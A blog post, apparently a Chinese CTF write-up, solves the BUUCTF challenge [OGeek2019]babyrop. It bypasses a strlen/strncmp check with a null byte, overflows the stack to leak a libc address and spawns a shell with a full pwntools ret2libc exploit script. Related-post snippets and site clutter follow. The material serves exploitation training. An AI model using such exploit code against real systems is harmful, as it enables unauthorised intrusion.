[OGeek2019]babyrop

已于 2022-05-08 11:34:45 修改
阅读量154 收藏
点赞数
文章标签: 安全 网络
于 2022-05-08 11:32:40 首次发布
原文链接:https://bbs.pediy.com/thread-262357.htm
版权

题目分析

1.checksec

发现只开了NX保护,32位文件
在这里插入图片描述

2.IDA打开

(1)看main函数伪代码

由于有sub_80486BB(初始化缓存区函数),所以buf是个随机数
在这里插入图片描述

(2)看其他函数伪代码

①函数中有个字符串比较要绕过,所以要使v1=0
②已知strlen函数的缺陷使遇到\x00直接截断,所以可得输入的第一位数应为\x00
③已知buf[7],且函数中有read(0,buf,0x20u),此外经计算可得(?)v5=buf的第8位,所以可得v5可以被指定
在这里插入图片描述
④已知a1=v5,buf为[ebp-E7h],如果v5==127,由于C8<E7,无法覆盖返回地址,所以可得v5需要仅可能大。所以填上\xff(255),使其执行else进行溢出
在这里插入图片描述

from pwn import *
io=remote('node4.buuoj.cn',26184)

elf=ELF('./pwn')
libc=ELF('./libc-2.23.so')

system_libc=libc.symbols['system']
binsh_libc=libc.search('/bin/sh').next()
write_libc=libc.symbols['write']
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=0x8048825
 
payload='\x00'+'\xff'*6+'\xff' #v5
 
io.sendline(payload)
 
io.recvuntil("Correct\n")
payload='a'*(0xe7+4)+p32(write_plt)+p32(main_addr)
#                        ret1           ret2 
#这里有个套娃:write_plt覆盖的是sub_80487D0函数的返回地址,而write函数是main函数的函数,所以后面需要有三个write的参数
payload+=p32(1)+p32(write_got)+p32(4)
#write   par1     par2         par3

io.sendline(payload)
 
write_addr=u32(io.recv(4))
#得到了write在内存中的位置 所以我们可以用题目提供的函数共享库算出system在内存中的位置
base=write_addr-write_libc
 
system_addr=system_libc+base
 
binsh_addr=binsh_libc+base
 
payload='\x00'+'\xff'*7
 
io.sendline(payload)
 
io.recvuntil("Correct\n")
 #第二次就直接把返回地址改成system的地址
payload='a'*(0xe7+4)+p32(system_addr)+p32(main_addr)
 
payload+=p32(binsh_addr)
 
io.sendline(payload)
 
io.interactive()
Dem1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF PWN OGeek2019 babyrop
Rt1Text的博客
05-01 325
1.checksec+运行 32位/ NX保护开启/ 还有Full RELRO 2.IDA进行中
OGEEK2019 babyrop wp
qq_43409582的博客
03-19 2198
这题就是需要绕过两个验证,之后就是常规rop了。 这里有个比较,你输入的值与一个随机数进行比较,这个验证不过会直接推出程序。那我们就让他取一个极值,让他无论是何值都能过。因为strlen这个函数遇到’\0’就会截止。所以我们就输入‘\x00’就好了。这样不论随机数是什么我们都会取<0。 这个地方的取值是之前那个函数的返回值,利用之前那个输入的地方把v5盖成一个很大的值以便之后做栈溢出的rop...
[OGeek2019]babyrop[BUUCTF]
moonlightsunshin的博客
05-06 364
首先我们要确保strncmp=0保证程序不退出,直接让v1=0strncmp就会为0strncmp用来获取长度当读到"\0"会自动赋0所以我们让buf[0]="\x00"没有/bin/sh和system加上题目这道题的思路就是利用write泄露出libc的地址来进行ROP。buf长度只需0xe7+4就可以溢出。32位开了NX,地址随机化基本排除shellcode的可能。write也是libc库中的标准函数。shift+f12看字符串。
OGeek2019_babyrop
z1r0的博客
12-04 270
OGeek2019_babyrop 查看保护 取了一个随机数,接着跟进一下804871f 匹配用户输入的是否与随机数相等。这里使用\x00来绕过,返回了一个v5,v5没有给值,我们再接着往下看 这个函数内a1超过0xE7就会溢出过ebp,所以我们让a1为0xff,就可以溢出很长的空间,这里的a1也就是上面的v5,所以我们肯定要控制v5,看一下v5和buf的关系 804871f这个函数内可以让buf输入0x20个字符,v5和buf距离为7,这样我们就可以控制v5了。接下来rop就好了 from pw
BUUCTF [OGeek2019]babyrop
红叶的博客
10-30 658
不知道为什么远程进不去,后来选择了不用LibcSearcher,用题目提供的Libc进去了。分析完反汇编成C语言的程序源码后,就是常规的ret2libc了。由于本题是32位ELF,因此不需要rdi与ret栈对齐。思路有了,接下来是构造PoC与Payload。strlen 遇到 \x00会截断。使用puts函数进行泄露真实地址。成功本地获取shell。首先绕过 strlen。
BUUCTF--[OGeek2019]babyrop
N1rvana的博客
11-14 3668
才学习了基本的ROP流程,到处找题练,不过也没做出来几道题,以这道32位的题作为例题吧。 这道题是BUUCTF上pwn练习题里的[OGeek2019]babyrop。 代码审计 老规矩先checksec一下: 没有canary保护,nx保护开启排除shellcode可能性,FULL RELEO为地址随机化。 观察主函数,先设定了一个闹铃,到时间就会强制退出程序,解除闹铃的方法在上一篇博客中提到过了, 这道题中闹铃函数依然对我们解题起不到什么干扰作用。 主函数的思路大概是:生成一个随机数,把这个随机数作为
OGeek2019 babyrop
qq_60209620的博客
04-11 144
向buf中输入值,read的返回字符串是包括了最后的"\0"的,所以假如我们输入”a“,那么V5=2;之后再将buf最后加上0;比较我们的输入buf与随机数s是否相等,相等就会推出函数;所以我们的第一个目标就是绕过strncmp;所以之后的事就是泄露write地址获取libc基址。而当a1=127时,C8<E7,不能达到栈溢出。因为没有程序system和/bin/sh。最后这个函数会返回buf[7]a1就是之前的buf[7]所以我们要构造尽量大的a1。这里才是真正的栈溢出。
ctf【[OGeek2019]babyrop
HUANGliang_的博客
10-29 248
(1)用0x00绕过strncmp比较 (2)进入sub_80487D0函数进行第二次输入,因为buf有0xe7字节,因此0xc8是不够输入的,为使得多输入一些字符可以将a1写为0xff (3)泄漏read的got地址,求得偏移量,通过溢出执行write函数,打印出read的got地址,并在此之后重新执行sub_80487D0函数 (4)根据得到的read的got地址求偏移量,计算出system函数地址和"\bin\sh"的地址,实施漏洞攻击,夺取权限
Buuctf(pwn)[OGeek2019]babyrop
半岛铁盒的博客
03-25 664
发现第二个函数有个read函数,但它是0x20是不能够构成漏洞利用,只是利用它作为中间的一个简单的输出即可; 跳过if判定: 只需在第一次输入时 在最前面加上 ‘\0’ a1上上一次返回的 buf[7] 这里的漏洞点利用, 要保证 a1的值尽可能的大, 这里选择的是 ‘xff’ – 255 该题目已经为我们提供了Libc Exp可以这样写 from pwn import * p = remote("node3.buuoj.cn",29829) libc=ELF('libc-2.23....
CTF buuoj pwn-----第8题:[OGeek2019]babyrop
bing_Max的博客
09-27 503
CTF buuoj pwn-----第8题:[OGeek2019]babyrop前言1. checksec2. 解题思路2.1 函数分析2.2 栈帧分析3. 编写EXP4. 运行EXP,获取flag 前言 梳理记录一下这道题的解题过程. 1. checksec bing@bing-virtual-machine:~/pwn$ checksec babyrop [*] '/home/bing/pwn/babyrop' Arch: i386-32-little RELRO: F
天池OGeek算法挑战赛数据.zip
12-21
标题中的“天池OGeek算法挑战赛数据.zip”表明这是一个与阿里巴巴天池平台上的OGeek算法竞赛相关的数据集。天池是阿里云主办的一个数据科学和机器学习竞赛平台,旨在促进数据科学的发展和应用,挑战赛通常涉及到各种...
OGeek
03-19
lgb 代码入口:sh base_run.sh。 写了很多冗余特征,跑起来非常慢,需要做一下特征选择。 线上提交后0.7154。 代码中用到了分词和词向量,需要将切词的代码换成自己的切词代码,需要自己提供词向量。...
TianChi_OGeek
03-19
"TianChi_OGeek"很可能是一个与数据分析或机器学习相关的项目,参与者需要解决特定的数据问题并提交解决方案。在这个项目中,我们遇到了一个具体的问题,即在训练数据集(train)的第1815102行存在一个遗漏的引号,这...
OGeek-数据集
03-30
标题中的“OGeek-数据集”表明这是一个与OGeek相关的数据集合,可能是用于机器学习、数据分析或人工智能项目的训练和评估数据。OGeek可能是一个竞赛平台、研究项目或者是一个专注于数据科学的社区。 描述中只提到...
OGeek:基准线
03-19
"OGeek:基准线"项目是一个基于Python的性能基准测试平台,用于衡量和比较不同算法或代码片段的效率。这个项目的初次提交在线上评测中取得了0.6643的评分,排名为第18位,后续的开发中可能会不断优化思路和策略。 在...
大坝安全监测设备有哪些主要功能?
最新发布
yyth13276363312的博客
07-24 253
12。3. **实时预警和报警处理**:提供精准的安全预警信息,及时处理可能的危险情况12。1. **实时监测大坝的各项物理参数**:包括应变、位移、水位、流量等12。6. **环境量监测**:包括上/下游水位、气温、降水量等11
如何避免蓝屏?轻量部署,安全和业务连续性才能两不误
亚信安全官方账号的博客
07-23 630
轻量部署,安全和业务连续性才能两不误
深入理解Kubescape: Kubernetes安全平台与容器镜像漏洞修复
TechEnthusiast的博客
07-23 226
Kubescape是一个开源的Kubernetes安全平台,由ARMO公司开发并维护。风险分析安全合规性检查配置错误扫描容器镜像漏洞扫描和修复Kubescape的优势在于其全面性和易用性。它不仅能够识别问题,还能提供修复建议,甚至在某些情况下自动进行修复。Kubescape作为一个全面的Kubernetes安全平台,其镜像修复功能为用户提供了强大的工具来应对容器安全挑战。通过自动化的漏洞扫描和修复流程,它大大降低了维护Kubernetes环境安全性的复杂度和工作量。
【技术升级】Docker环境下Nacos平滑升级攻略,安全配置一步到位
IT后浪的博客
07-23 503
目前项目当中使用的Nacos版本为2.0.2,该版本可能存在一定的安全风险。软件的安全性是一个持续关注的问题,尤其是对于像Nacos这样的服务发现与配置管理平台,它在微服务架构中扮演着核心角色。随着新版本的发布,开发团队会修复已知的安全漏洞,并增强系统的整体安全性。因此要及时升级Nacos,避免因为安全问题,对项目造成影响。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值